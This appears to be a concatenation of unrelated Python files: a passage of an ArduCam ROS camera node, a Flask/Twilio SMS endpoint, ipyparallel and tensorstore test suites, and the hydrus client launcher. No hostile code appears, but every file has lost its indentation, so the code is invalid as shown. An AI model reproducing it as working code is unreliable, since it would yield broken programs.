image = cv2.cvtColor(image,COLOR_BayerGB2BGR)
#HERE ONLY OUTPUTS CURRENT FPS -> IS THIS REALLY NEEDED?
time1 = time.time()
if time1 - time0 >= 1:
#print "%s %d %s\n"%("fps:",count,"/s")
print (time1 - time0)
count = 0
time0 = time1
count += 1
# POTENTIALLY SAVES THE IMAGE -> NEEDED?!
if save_flag:
cv2.imwrite("images/image%d.jpg"%totalFrame,image)
totalFrame += 1
# Descide if you want to resize or not here!!
# ATTENTION: THIS INFLUENCES THE RESULTING FRAME RATE
#image = cv2.resize(image,(640,480),interpolation = cv2.INTER_LINEAR)
# INCLUDE FCT INN THE FUTURE WHICH PART OF THE IMAGE I WANT TO SEE,...
# CROPPING IS HERE:
#image = image[0:640, 0:480]
# DESCIDE IF THE NORMAL DEMO WINDOW SHOULD OPEN OR NOT
# IN LONG EXPOSURE SCENARIO THIS MAKES NO BIG DIFFERENCE!!!
cv2.imshow("ArduCam Demo",image)
cv2.waitKey(10)
#NEWLY INSERTED ROS PUBLISHER
try:
publisher_img.publish(bridge.cv2_to_imgmsg(image,'mono8'))
except CvBridgeError as e:
print(e)
#publisher_img.publish(image)
# assuming: del deletes the pic,...
#ArducamSDK.Py_ArduCam_del(handle)
ArducamSDK.Py_ArduCam_flush(handle)
#print "------------------------display time:",(time.time() - display_time)
else:
time.sleep(0.001);
count1 = count1 - 1
rt_lock.release()
else:
time.sleep(0.001)
else:
time.sleep(0.001)
def register_changer():
rospy.Subscriber("change_reg", String, callback_change)
# spin() simply keeps python from exiting until this node is stopped
def callback_change(data):
#rospy.loginfo(rospy.get_caller_id() + "I heard %s", data.data)
split_str = data.data.split()
if (len(split_str)==2):
writeSingleSensorReg(split_str[0],split_str[1])
else:
print ("INVALID WRITING STATEMENT")
def register_reader():
rospy.Subscriber("read_reg", String, callback_read)
# spin() simply keeps python from exiting until this node is stopped
def callback_read(data):
#rospy.loginfo(rospy.get_caller_id() + "I heard %s", data.data)
split_str = data.data.split()
if (len(split_str)==1):
readSingleSensorReg(split_str[0])
else:
print ("INVALID READING STATEMENT")
def logging_reader():
rospy.Subscriber("logging_topic", String, callback_log)
# spin() simply keeps python from exiting until this node is stopped
def callback_log(data):
global logging, logname,loghandle, logpath,log_stepsize,curr_logging,loghandle1
#rospy.loginfo(rospy.get_caller_id() + "I heard %s", data.data)
split_str = data.data.split()
if((logging == True) and (split_str[0] == "false")):
quitting = True
while quitting:
if curr_logging:
time.sleep(0.1)
else:
quitting = False
logging = False
loghandle.close()
loghandle1.close()
print "Logging to" + logname + "has ended"
if((logging == False) and (split_str[0] == "true")):
logname = split_str[1]
if os.path.isfile(logpath + "/" + logname + ".txt"):
rospy.logwarn("File already exists! No log started")
else:
logging = True
loghandle = open(logpath + "/" + logname + ".txt", 'w')
loghandle1 = file(logpath + "/" + logname + "_raw.bin","wb")
print "Start logging to" + logname
loghandle.write("stepsize" + ' ' + str(log_stepsize) + ';' + '\n')
# dummy class which handles what happens on ROS shutdown!!!
class onRosShutdown(object):
def __init__(self):
pass
def onShutdown(self):
rospy.loginfo('Shutting down Arducam Image Capture due to ROS ending!!!')
def showHelp():
print " usage: sudo python ArduCam_Py_Demo.py <path/config-file-name> \
\n\n example: sudo python ArduCam_Py_Demo.py ../Config/AR0134_960p_Color.yml \
\n\n While the program is running, you can press the following buttons in the terminal: \
\n\n 's' + Enter:Save the image to the images folder. \
\n\n 'c' + Enter:Stop saving images. \
\n\n 'q' + Enter:Stop running the program. \
\n\n"
def sigint_handler(signum, frame):
global running,handle
running = False
exit()
signal.signal(signal.SIGINT, sigint_handler)
signal.signal(signal.SIGHUP, sigint_handler)
signal.signal(signal.SIGTERM, sigint_handler)
if __name__ == "__main__":
rospy.init_node('arducam_node', anonymous=False)
publisher_img = rospy.Publisher("/arducam_node/image", Image, queue_size=1)
# READING THE CONFIG FILE HERE from the launchfile!!!
config_file_name = rospy.get_param("~cam_model", "")
#print config_file_name
#print os.path.exists(config_file_name)
if not os.path.exists(config_file_name):
print "Config file does not exist."
exit()
if camera_initFromFile(config_file_name):
ct = threading.Thread(target=captureImage_thread)
rt = threading.Thread(target=readImage_thread,args=(publisher_img,))
ct.setDaemon(True)
rt.setDaemon(True)
ct.start()
rt.start()
register_changer()
register_reader()
logging_reader()
handleShutdown = onRosShutdown()
rospy.on_shutdown(handleShutdown.onShutdown)
rospy.spin()
while running:
input_kb = str(sys.stdin.readline()).strip("\n")
print ("HELLO I AM HERE 1")
if input_kb == 'q' or input_kb == 'Q':
running = False
if input_kb == 's' or input_kb == 'S':
save_flag = True
if input_kb == 'c' or input_kb == 'C':
save_flag = False
ct.join()
rt.join()
print ("HELLO I AM HERE 2")
#pause
#ArducamSDK.Py_ArduCam_writeReg_8_8(handle,0x46,3,0x40)
rtn_val = ArducamSDK.Py_ArduCam_close(handle)
if rtn_val == 0:
print "device close success!"
else:
print "device close fail!"
#os.system("pause")
|
callme.py
|
import datetime
import os
import queue
import random
import threading
import time
from flask import jsonify
from flask import request
from server import app
from server.routes import prometheus
from twilio.rest import Client
from server.config import db
# Initialize the Twilio client
#
# Your Account Sid and Auth Token from twilio.com/console
# and set the environment variables. See http://twil.io/secure
account_sid = os.environ.get('TWILIO_ACCOUNT_SID')
auth_token = os.environ.get('TWILIO_AUTH_TOKEN')
from_phone_number = os.environ.get('TWILIO_PHONE_NUMBER')
sleep_min = int(os.environ.get('CALL_SLEEP_MIN', 1))
sleep_max = int(os.environ.get('CALL_SLEEP_MAX', 10))
client = None
if account_sid and auth_token and from_phone_number:
client = Client(account_sid, auth_token)
# Queue and tasks for calling to add random wait times between calls
q = queue.Queue()
def caller():
while True:
callee = q.get()
print('Begin calling:', callee)
phone = callee[0]
msg = callee[1]
posted = callee[2]
call_via_twilio(phone, msg)
print('Done texting "', msg, '" to', phone)
db.insert_call_me(
{
'PHONE': phone[1:],
'POSTED': posted,
'CALLED': datetime.datetime.now()
}
)
s = random.randint(sleep_min, sleep_max)
print('Wait ', s, 'seconds')
time.sleep(s)
q.task_done()
threading.Thread(target=caller, daemon=True).start()
# Random initial text message
hellos = [
'Hi there',
'Howdy',
'Hi',
'Hey'
]
@app.route("/api/v1/callme", methods=['POST'])
@prometheus.track_requests
def callme():
"""callme numbers route"""
call_these = request.get_json(force=True)
for i in call_these:
name = i.get('name')
digits = ''.join(n for n in i['phone'] if n.isdigit())
prefix = '+1' if len(digits) == 10 else '+'
phone = prefix + digits
message = i.get('message', random.choice(hellos))
print("POST", name, "at", phone, "message:", message)
q.put((phone, message, datetime.datetime.now()))
state = {"status": "Accepted"}
return jsonify(state), 202
def call_via_twilio(to_phone_number, message):
if not client:
print("--> Skipping Twilio call because it is not configured. <--")
return
try:
message = client.messages.create(
to=to_phone_number,
from_=from_phone_number,
body=message)
print("Twilio message SID:", message.sid)
print("Twilio message:", message)
except Exception as e:
print(e)
|
test_client.py
|
"""Tests for parallel client.py"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import division
from concurrent.futures import Future
from datetime import datetime
import os
from threading import Thread
import time
from tornado.concurrent import Future as TornadoFuture
from IPython import get_ipython
from ipyparallel.client import client as clientmod
from ipyparallel import error, AsyncHubResult, DirectView, Reference
from ipyparallel.util import utc
from .clienttest import ClusterTestCase, wait, add_engines, skip_without
def setup():
add_engines(4, total=True)
class TestClient(ClusterTestCase):
def test_ids(self):
n = len(self.client.ids)
self.add_engines(2)
self.assertEqual(len(self.client.ids), n+2)
def test_iter(self):
self.minimum_engines(4)
engine_ids = [ view.targets for view in self.client ]
self.assertEqual(engine_ids, self.client.ids)
def test_view_indexing(self):
"""test index access for views"""
self.minimum_engines(4)
targets = self.client._build_targets('all')[-1]
v = self.client[:]
self.assertEqual(v.targets, targets)
t = self.client.ids[2]
v = self.client[t]
self.assertTrue(isinstance(v, DirectView))
self.assertEqual(v.targets, t)
t = self.client.ids[2:4]
v = self.client[t]
self.assertTrue(isinstance(v, DirectView))
self.assertEqual(v.targets, t)
v = self.client[::2]
self.assertTrue(isinstance(v, DirectView))
self.assertEqual(v.targets, targets[::2])
v = self.client[1::3]
self.assertTrue(isinstance(v, DirectView))
self.assertEqual(v.targets, targets[1::3])
v = self.client[:-3]
self.assertTrue(isinstance(v, DirectView))
self.assertEqual(v.targets, targets[:-3])
v = self.client[-1]
self.assertTrue(isinstance(v, DirectView))
self.assertEqual(v.targets, targets[-1])
self.assertRaises(TypeError, lambda : self.client[None])
def test_lbview_targets(self):
"""test load_balanced_view targets"""
v = self.client.load_balanced_view()
self.assertEqual(v.targets, None)
v = self.client.load_balanced_view(-1)
self.assertEqual(v.targets, [self.client.ids[-1]])
v = self.client.load_balanced_view('all')
self.assertEqual(v.targets, None)
def test_dview_targets(self):
"""test direct_view targets"""
v = self.client.direct_view()
self.assertEqual(v.targets, 'all')
v = self.client.direct_view('all')
self.assertEqual(v.targets, 'all')
v = self.client.direct_view(-1)
self.assertEqual(v.targets, self.client.ids[-1])
def test_lazy_all_targets(self):
"""test lazy evaluation of rc.direct_view('all')"""
v = self.client.direct_view()
self.assertEqual(v.targets, 'all')
def double(x):
return x*2
seq = list(range(100))
ref = [ double(x) for x in seq ]
# add some engines, which should be used
self.add_engines(1)
n1 = len(self.client.ids)
# simple apply
r = v.apply_sync(lambda : 1)
self.assertEqual(r, [1] * n1)
# map goes through remotefunction
r = v.map_sync(double, seq)
self.assertEqual(r, ref)
# add a couple more engines, and try again
self.add_engines(2)
n2 = len(self.client.ids)
self.assertNotEqual(n2, n1)
# apply
r = v.apply_sync(lambda : 1)
self.assertEqual(r, [1] * n2)
# map
r = v.map_sync(double, seq)
self.assertEqual(r, ref)
def test_targets(self):
"""test various valid targets arguments"""
build = self.client._build_targets
ids = self.client.ids
idents,targets = build(None)
self.assertEqual(ids, targets)
def test_clear(self):
"""test clear behavior"""
self.minimum_engines(2)
v = self.client[:]
v.block=True
v.push(dict(a=5))
v.pull('a')
id0 = self.client.ids[-1]
self.client.clear(targets=id0, block=True)
a = self.client[:-1].get('a')
self.assertRaisesRemote(NameError, self.client[id0].get, 'a')
self.client.clear(block=True)
for i in self.client.ids:
self.assertRaisesRemote(NameError, self.client[i].get, 'a')
def test_get_result(self):
"""test getting results from the Hub."""
c = clientmod.Client(profile='iptest')
t = c.ids[-1]
ar = c[t].apply_async(wait, 1)
# give the monitor time to notice the message
time.sleep(.25)
ahr = self.client.get_result(ar.msg_ids[0], owner=False)
self.assertIsInstance(ahr, AsyncHubResult)
self.assertEqual(ahr.get(), ar.get())
ar2 = self.client.get_result(ar.msg_ids[0])
self.assertNotIsInstance(ar2, AsyncHubResult)
self.assertEqual(ahr.get(), ar2.get())
ar3 = self.client.get_result(ar2)
self.assertEqual(ar3.msg_ids, ar2.msg_ids)
ar3 = self.client.get_result([ar2])
self.assertEqual(ar3.msg_ids, ar2.msg_ids)
c.close()
def test_get_execute_result(self):
"""test getting execute results from the Hub."""
c = clientmod.Client(profile='iptest')
t = c.ids[-1]
cell = '\n'.join([
'import time',
'time.sleep(0.25)',
'5'
])
ar = c[t].execute("import time; time.sleep(1)", silent=False)
# give the monitor time to notice the message
time.sleep(.25)
ahr = self.client.get_result(ar.msg_ids[0], owner=False)
self.assertIsInstance(ahr, AsyncHubResult)
self.assertEqual(ahr.get().execute_result, ar.get().execute_result)
ar2 = self.client.get_result(ar.msg_ids[0])
self.assertNotIsInstance(ar2, AsyncHubResult)
self.assertEqual(ahr.get(), ar2.get())
c.close()
def test_ids_list(self):
"""test client.ids"""
ids = self.client.ids
self.assertEqual(ids, self.client._ids)
self.assertFalse(ids is self.client._ids)
ids.remove(ids[-1])
self.assertNotEqual(ids, self.client._ids)
def test_queue_status(self):
ids = self.client.ids
id0 = ids[0]
qs = self.client.queue_status(targets=id0)
self.assertTrue(isinstance(qs, dict))
self.assertEqual(sorted(qs.keys()), ['completed', 'queue', 'tasks'])
allqs = self.client.queue_status()
self.assertTrue(isinstance(allqs, dict))
intkeys = list(allqs.keys())
intkeys.remove('unassigned')
print("intkeys", intkeys)
intkeys = sorted(intkeys)
ids = self.client.ids
print("client.ids", ids)
ids = sorted(self.client.ids)
self.assertEqual(intkeys, ids)
unassigned = allqs.pop('unassigned')
for eid,qs in allqs.items():
self.assertTrue(isinstance(qs, dict))
self.assertEqual(sorted(qs.keys()), ['completed', 'queue', 'tasks'])
def test_shutdown(self):
ids = self.client.ids
id0 = ids[-1]
pid = self.client[id0].apply_sync(os.getpid)
self.client.shutdown(id0, block=True)
for i in range(150):
# give the engine 15 seconds to die
if id0 not in self.client.ids:
break
time.sleep(0.1)
self.assertNotIn(id0, self.client.ids)
self.assertRaises(IndexError, lambda : self.client[id0])
def test_result_status(self):
pass
# to be written
def test_db_query_dt(self):
"""test db query by date"""
hist = self.client.hub_history()
middle = self.client.db_query({'msg_id' : hist[len(hist)//2]})[0]
tic = middle['submitted']
before = self.client.db_query({'submitted' : {'$lt' : tic}})
after = self.client.db_query({'submitted' : {'$gte' : tic}})
self.assertEqual(len(before)+len(after),len(hist))
for b in before:
self.assertTrue(b['submitted'] < tic)
for a in after:
self.assertTrue(a['submitted'] >= tic)
same = self.client.db_query({'submitted' : tic})
for s in same:
self.assertTrue(s['submitted'] == tic)
def test_db_query_keys(self):
"""test extracting subset of record keys"""
found = self.client.db_query({'msg_id': {'$ne' : ''}},keys=['submitted', 'completed'])
for rec in found:
self.assertEqual(set(rec.keys()), set(['msg_id', 'submitted', 'completed']))
def test_db_query_default_keys(self):
"""default db_query excludes buffers"""
found = self.client.db_query({'msg_id': {'$ne' : ''}})
for rec in found:
keys = set(rec.keys())
self.assertFalse('buffers' in keys, "'buffers' should not be in: %s" % keys)
self.assertFalse('result_buffers' in keys, "'result_buffers' should not be in: %s" % keys)
def test_db_query_msg_id(self):
"""ensure msg_id is always in db queries"""
found = self.client.db_query({'msg_id': {'$ne' : ''}},keys=['submitted', 'completed'])
for rec in found:
self.assertTrue('msg_id' in rec.keys())
found = self.client.db_query({'msg_id': {'$ne' : ''}},keys=['submitted'])
for rec in found:
self.assertTrue('msg_id' in rec.keys())
found = self.client.db_query({'msg_id': {'$ne' : ''}},keys=['msg_id'])
for rec in found:
self.assertTrue('msg_id' in rec.keys())
def test_db_query_get_result(self):
"""pop in db_query shouldn't pop from result itself"""
self.client[:].apply_sync(lambda : 1)
found = self.client.db_query({'msg_id': {'$ne' : ''}})
rc2 = clientmod.Client(profile='iptest')
# If this bug is not fixed, this call will hang:
ar = rc2.get_result(self.client.history[-1])
ar.wait(2)
self.assertTrue(ar.ready())
ar.get()
rc2.close()
def test_db_query_in(self):
"""test db query with '$in','$nin' operators"""
hist = self.client.hub_history()
even = hist[::2]
odd = hist[1::2]
recs = self.client.db_query({ 'msg_id' : {'$in' : even}})
found = [ r['msg_id'] for r in recs ]
self.assertEqual(set(even), set(found))
recs = self.client.db_query({ 'msg_id' : {'$nin' : even}})
found = [ r['msg_id'] for r in recs ]
self.assertEqual(set(odd), set(found))
def test_hub_history(self):
hist = self.client.hub_history()
recs = self.client.db_query({ 'msg_id' : {"$ne":''}})
recdict = {}
for rec in recs:
recdict[rec['msg_id']] = rec
latest = datetime(1984,1,1).replace(tzinfo=utc)
for msg_id in hist:
rec = recdict[msg_id]
newt = rec['submitted']
self.assertTrue(newt >= latest)
latest = newt
ar = self.client[-1].apply_async(lambda : 1)
ar.get()
time.sleep(0.25)
self.assertEqual(self.client.hub_history()[-1:],ar.msg_ids)
def _wait_for_idle(self):
"""wait for the cluster to become idle, according to the everyone."""
rc = self.client
# step 0. wait for local results
# this should be sufficient 99% of the time.
rc.wait(timeout=5)
# step 1. wait for all requests to be noticed
# timeout 5s, polling every 100ms
msg_ids = set(rc.history)
hub_hist = rc.hub_history()
for i in range(50):
if msg_ids.difference(hub_hist):
time.sleep(0.1)
hub_hist = rc.hub_history()
else:
break
self.assertEqual(len(msg_ids.difference(hub_hist)), 0)
# step 2. wait for all requests to be done
# timeout 5s, polling every 100ms
qs = rc.queue_status()
for i in range(50):
if qs['unassigned'] or any(qs[eid]['tasks'] + qs[eid]['queue'] for eid in qs if eid != 'unassigned'):
time.sleep(0.1)
qs = rc.queue_status()
else:
break
# ensure Hub up to date:
self.assertEqual(qs['unassigned'], 0)
for eid in [ eid for eid in qs if eid != 'unassigned' ]:
self.assertEqual(qs[eid]['tasks'], 0)
self.assertEqual(qs[eid]['queue'], 0)
def test_resubmit(self):
def f():
import random
return random.random()
v = self.client.load_balanced_view()
ar = v.apply_async(f)
r1 = ar.get(1)
# give the Hub a chance to notice:
self._wait_for_idle()
ahr = self.client.resubmit(ar.msg_ids)
r2 = ahr.get(1)
self.assertFalse(r1 == r2)
def test_resubmit_chain(self):
"""resubmit resubmitted tasks"""
v = self.client.load_balanced_view()
ar = v.apply_async(lambda x: x, 'x'*1024)
ar.get()
self._wait_for_idle()
ars = [ar]
for i in range(10):
ar = ars[-1]
ar2 = self.client.resubmit(ar.msg_ids)
[ ar.get() for ar in ars ]
def test_resubmit_header(self):
"""resubmit shouldn't clobber the whole header"""
def f():
import random
return random.random()
v = self.client.load_balanced_view()
v.retries = 1
ar = v.apply_async(f)
r1 = ar.get(1)
# give the Hub a chance to notice:
self._wait_for_idle()
ahr = self.client.resubmit(ar.msg_ids)
ahr.get(1)
time.sleep(0.5)
records = self.client.db_query({'msg_id': {'$in': ar.msg_ids + ahr.msg_ids}}, keys='header')
h1,h2 = [ r['header'] for r in records ]
for key in set(h1.keys()).union(set(h2.keys())):
if key in ('msg_id', 'date'):
self.assertNotEqual(h1[key], h2[key])
else:
self.assertEqual(h1[key], h2[key])
def test_resubmit_aborted(self):
def f():
import random
return random.random()
v = self.client.load_balanced_view()
# restrict to one engine, so we can put a sleep
# ahead of the task, so it will get aborted
eid = self.client.ids[-1]
v.targets = [eid]
sleep = v.apply_async(time.sleep, 0.5)
ar = v.apply_async(f)
ar.abort()
self.assertRaises(error.TaskAborted, ar.get)
# Give the Hub a chance to get up to date:
self._wait_for_idle()
ahr = self.client.resubmit(ar.msg_ids)
r2 = ahr.get(1)
def test_resubmit_inflight(self):
"""resubmit of inflight task"""
v = self.client.load_balanced_view()
ar = v.apply_async(time.sleep,1)
# give the message a chance to arrive
time.sleep(0.2)
ahr = self.client.resubmit(ar.msg_ids)
ar.get(2)
ahr.get(2)
def test_resubmit_badkey(self):
"""ensure KeyError on resubmit of nonexistant task"""
self.assertRaisesRemote(KeyError, self.client.resubmit, ['invalid'])
def test_purge_hub_results(self):
# ensure there are some tasks
for i in range(5):
self.client[:].apply_sync(lambda : 1)
# Wait for the Hub to realise the result is done:
# This prevents a race condition, where we
# might purge a result the Hub still thinks is pending.
self._wait_for_idle()
rc2 = clientmod.Client(profile='iptest')
hist = self.client.hub_history()
ahr = rc2.get_result([hist[-1]])
ahr.wait(10)
self.client.purge_hub_results(hist[-1])
newhist = self.client.hub_history()
self.assertEqual(len(newhist)+1,len(hist))
rc2.close()
def test_purge_local_results(self):
# ensure there are some tasks
# purge local results is mostly unnecessary now that we have Futures
msg_id = 'asdf'
self.client.results[msg_id] = 5
md = self.client.metadata[msg_id]
before = len(self.client.results)
self.assertEqual(len(self.client.metadata), before)
self.client.purge_local_results(msg_id)
self.assertLessEqual(len(self.client.results), before-1, msg="Not removed from results")
self.assertLessEqual(len(self.client.metadata), before-1, msg="Not removed from metadata")
def test_purge_local_results_outstanding(self):
v = self.client[-1]
ar = v.apply_async(time.sleep, 1)
with self.assertRaises(RuntimeError):
self.client.purge_local_results(ar)
ar.get()
self.client.purge_local_results(ar)
def test_purge_all_local_results_outstanding(self):
v = self.client[-1]
ar = v.apply_async(time.sleep, 1)
with self.assertRaises(RuntimeError):
self.client.purge_local_results('all')
ar.get()
self.client.purge_local_results('all')
def test_purge_all_hub_results(self):
self.client.purge_hub_results('all')
hist = self.client.hub_history()
self.assertEqual(len(hist), 0)
def test_purge_all_local_results(self):
self.client.purge_local_results('all')
self.assertEqual(len(self.client.results), 0, msg="Results not empty")
self.assertEqual(len(self.client.metadata), 0, msg="metadata not empty")
def test_purge_all_results(self):
# ensure there are some tasks
for i in range(5):
self.client[:].apply_sync(lambda : 1)
self.client.wait(10)
self._wait_for_idle()
self.client.purge_results('all')
self.assertEqual(len(self.client.results), 0, msg="Results not empty")
self.assertEqual(len(self.client.metadata), 0, msg="metadata not empty")
hist = self.client.hub_history()
self.assertEqual(len(hist), 0, msg="hub history not empty")
def test_purge_everything(self):
# ensure there are some tasks
for i in range(5):
self.client[:].apply_sync(lambda : 1)
self.client.wait(10)
self._wait_for_idle()
self.client.purge_everything()
# The client results
self.assertEqual(len(self.client.results), 0, msg="Results not empty")
self.assertEqual(len(self.client.metadata), 0, msg="metadata not empty")
# The client "bookkeeping"
self.assertEqual(len(self.client.session.digest_history), 0, msg="session digest not empty")
self.assertEqual(len(self.client.history), 0, msg="client history not empty")
# the hub results
hist = self.client.hub_history()
self.assertEqual(len(hist), 0, msg="hub history not empty")
def test_activate(self):
ip = get_ipython()
magics = ip.magics_manager.magics
self.assertTrue('px' in magics['line'])
self.assertTrue('px' in magics['cell'])
v0 = self.client.activate(-1, '0')
self.assertTrue('px0' in magics['line'])
self.assertTrue('px0' in magics['cell'])
self.assertEqual(v0.targets, self.client.ids[-1])
v0 = self.client.activate('all', 'all')
self.assertTrue('pxall' in magics['line'])
self.assertTrue('pxall' in magics['cell'])
self.assertEqual(v0.targets, 'all')
def test_wait_interactive(self):
ar = self.client[-1].apply_async(lambda : 1)
self.client.wait_interactive()
self.assertEqual(self.client.outstanding, set())
def test_await_future(self):
f = Future()
tf = TornadoFuture()
def finish_later():
time.sleep(0.1)
f.set_result('future')
tf.set_result('tornado')
Thread(target=finish_later).start()
assert self.client.wait([f, tf])
assert f.done()
assert tf.done()
assert f.result() == 'future'
assert tf.result() == 'tornado'
@skip_without('distributed')
def test_become_dask(self):
executor = self.client.become_dask()
reprs = self.client[:].apply_sync(repr, Reference('distributed_worker'))
for r in reprs:
self.assertIn("Worker", r)
squares = executor.map(lambda x: x * x, range(10))
tot = executor.submit(sum, squares)
self.assertEqual(tot.result(), 285)
# cleanup
self.client.stop_distributed()
ar = self.client[:].apply_async(lambda x: x, Reference('distributed_worker'))
self.assertRaisesRemote(NameError, ar.get)
|
hydrus_client.py
|
#!/usr/bin/env python3
# Hydrus is released under WTFPL
# You just DO WHAT THE FUCK YOU WANT TO.
# https://github.com/sirkris/WTFPL/blob/master/WTFPL.md
import locale
try: locale.setlocale( locale.LC_ALL, '' )
except: pass
try:
import os
import argparse
import sys
from hydrus.core import HydrusBoot
HydrusBoot.AddBaseDirToEnvPath()
# initialise Qt here, important it is done early
from hydrus.client.gui import QtPorting as QP
from hydrus.core import HydrusConstants as HC
from hydrus.core import HydrusData
from hydrus.core import HydrusGlobals as HG
from hydrus.core import HydrusLogger
from hydrus.core import HydrusPaths
from hydrus.core import HydrusTemp
argparser = argparse.ArgumentParser( description = 'hydrus network client' )
argparser.add_argument( '-d', '--db_dir', help = 'set an external db location' )
argparser.add_argument( '--temp_dir', help = 'override the program\'s temporary directory' )
argparser.add_argument( '--db_journal_mode', default = 'WAL', choices = [ 'WAL', 'TRUNCATE', 'PERSIST', 'MEMORY' ], help = 'change db journal mode (default=WAL)' )
argparser.add_argument( '--db_cache_size', type = int, help = 'override SQLite cache_size per db file, in MB (default=256)' )
argparser.add_argument( '--db_transaction_commit_period', type = int, help = 'override how often (in seconds) database changes are saved to disk (default=30,min=10)' )
argparser.add_argument( '--db_synchronous_override', type = int, choices = range(4), help = 'override SQLite Synchronous PRAGMA (default=2)' )
argparser.add_argument( '--no_db_temp_files', action='store_true', help = 'run db temp operations entirely in memory' )
argparser.add_argument( '--boot_debug', action='store_true', help = 'print additional bootup information to the log' )
argparser.add_argument( '--no_wal', action='store_true', help = 'OBSOLETE: run using TRUNCATE db journaling' )
argparser.add_argument( '--db_memory_journaling', action='store_true', help = 'OBSOLETE: run using MEMORY db journaling (DANGEROUS)' )
result = argparser.parse_args()
if result.db_dir is None:
db_dir = HC.DEFAULT_DB_DIR
if not HydrusPaths.DirectoryIsWriteable( db_dir ) or HC.RUNNING_FROM_MACOS_APP:
if HC.USERPATH_DB_DIR is None:
raise Exception( 'The default db path "{}" was not writeable, and the userpath could not be determined!'.format( HC.DEFAULT_DB_DIR ) )
db_dir = HC.USERPATH_DB_DIR
else:
db_dir = result.db_dir
db_dir = HydrusPaths.ConvertPortablePathToAbsPath( db_dir, HC.BASE_DIR )
if not HydrusPaths.DirectoryIsWriteable( db_dir ):
raise Exception( 'The given db path "{}" is not a writeable-to!'.format( db_dir ) )
try:
HydrusPaths.MakeSureDirectoryExists( db_dir )
except:
raise Exception( 'Could not ensure db path "{}" exists! Check the location is correct and that you have permission to write to it!'.format( db_dir ) )
if not os.path.isdir( db_dir ):
raise Exception( 'The given db path "{}" is not a directory!'.format( db_dir ) )
HG.db_journal_mode = result.db_journal_mode
if result.no_wal:
HG.db_journal_mode = 'TRUNCATE'
if result.db_memory_journaling:
HG.db_journal_mode = 'MEMORY'
if result.db_cache_size is not None:
HG.db_cache_size = result.db_cache_size
else:
HG.db_cache_size = 256
if result.db_transaction_commit_period is not None:
HG.db_transaction_commit_period = max( 10, result.db_transaction_commit_period )
else:
HG.db_transaction_commit_period = 30
if result.db_synchronous_override is not None:
HG.db_synchronous = int( result.db_synchronous_override )
else:
if HG.db_journal_mode == 'WAL':
HG.db_synchronous = 1
else:
HG.db_synchronous = 2
HG.no_db_temp_files = result.no_db_temp_files
HG.boot_debug = result.boot_debug
try:
from twisted.internet import reactor
except:
HG.twisted_is_broke = True
except Exception as e:
try:
HydrusData.DebugPrint( 'Critical boot error occurred! Details written to crash.log!' )
HydrusData.PrintException( e )
except:
pass
import traceback
error_trace = traceback.format_exc()
print( error_trace )
if 'db_dir' in locals() and os.path.exists( db_dir ):
emergency_dir = db_dir
else:
emergency_dir = os.path.expanduser( '~' )
possible_desktop = os.path.join( emergency_dir, 'Desktop' )
if os.path.exists( possible_desktop ) and os.path.isdir( possible_desktop ):
emergency_dir = possible_desktop
dest_path = os.path.join( emergency_dir, 'hydrus_crash.log' )
with open( dest_path, 'w', encoding = 'utf-8' ) as f:
f.write( error_trace )
print( 'Critical boot error occurred! Details written to hydrus_crash.log in either db dir or user dir!' )
sys.exit( 1 )
def boot():
if result.temp_dir is not None:
HydrusTemp.SetEnvTempDir( result.temp_dir )
controller = None
with HydrusLogger.HydrusLogger( db_dir, 'client' ) as logger:
try:
HydrusData.Print( 'hydrus client started' )
if not HG.twisted_is_broke:
import threading
threading.Thread( target = reactor.run, name = 'twisted', kwargs = { 'installSignalHandlers' : 0 } ).start()
from hydrus.client import ClientController
controller = ClientController.Controller( db_dir )
controller.Run()
except:
HydrusData.Print( 'hydrus client failed' )
import traceback
HydrusData.Print( traceback.format_exc() )
finally:
HG.started_shutdown = True
HG.view_shutdown = True
HG.model_shutdown = True
if controller is not None:
controller.pubimmediate( 'wake_daemons' )
if not HG.twisted_is_broke:
reactor.callFromThread( reactor.stop )
HydrusData.Print( 'hydrus client shut down' )
HG.shutdown_complete = True
if HG.restart:
HydrusData.RestartProcess()
|
future_test.py
|
# Copyright 2020 The TensorStore Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import os
import pickle
import time
import signal
import threading
import pytest
import tensorstore as ts
pytestmark = pytest.mark.asyncio
def test_promise_new():
promise, future = ts.Promise.new()
assert future.done() == False
promise.set_result(5)
assert future.done()
assert future.result() == 5
def test_promise_result_release_gil():
promise, future = ts.Promise.new()
t = threading.Thread(target=future.result)
t.start()
time.sleep(0.1)
promise.set_result(5)
t.join()
def test_promise_set_exception():
promise, future = ts.Promise.new()
assert future.done() == False
promise.set_exception(ValueError('abc'))
with pytest.raises(ValueError, match='abc'):
future.result()
assert isinstance(future.exception(), ValueError)
@pytest.mark.skipif(
os.name == 'nt',
reason='CTRL_C_EVENT is delayed on Windows until keyboard input is received'
)
@pytest.mark.skipif(
'signal.getsignal(signal.SIGINT) != signal.default_int_handler',
reason='SIGINT handler not installed')
def test_promise_wait_interrupt():
promise, future = ts.Promise.new()
def do_interrupt():
time.sleep(0.01)
sig = signal.CTRL_C_EVENT if os.name == 'nt' else signal.SIGINT # type: ignore
os.kill(os.getpid(), sig)
with pytest.raises(KeyboardInterrupt):
threading.Thread(target=do_interrupt).start()
future.result(timeout=5)
def test_promise_cancel():
promise, future = ts.Promise.new()
assert future.done() == False
def do_cancel():
time.sleep(0.1)
future.cancel()
t = threading.Thread(target=do_cancel)
t.start()
with pytest.raises(asyncio.CancelledError):
future.result(timeout=5)
t.join()
def test_promise_timeout():
promise, future = ts.Promise.new()
assert future.done() == False
with pytest.raises(TimeoutError):
future.result(timeout=0.1)
with pytest.raises(TimeoutError):
future.result(deadline=time.time() + 0.1)
promise.set_result(5)
assert future.result(timeout=0) == 5
async def test_coroutine():
async def do_async():
return 42
assert await ts.Future(do_async()) == 42
async def test_coroutine_explicit_loop():
data = threading.local()
loop_promise, loop_future = ts.Promise.new()
def thread_proc():
nonlocal loop
data.thread = 'new'
loop = asyncio.new_event_loop()
loop_promise.set_result(loop)
loop.run_forever()
t = threading.Thread(target=thread_proc)
t.start()
loop = await loop_future
async def do_async():
return data.thread
data.thread = 'main'
assert await ts.Future(do_async()) == 'main'
assert await ts.Future(do_async(), loop=loop) == 'new'
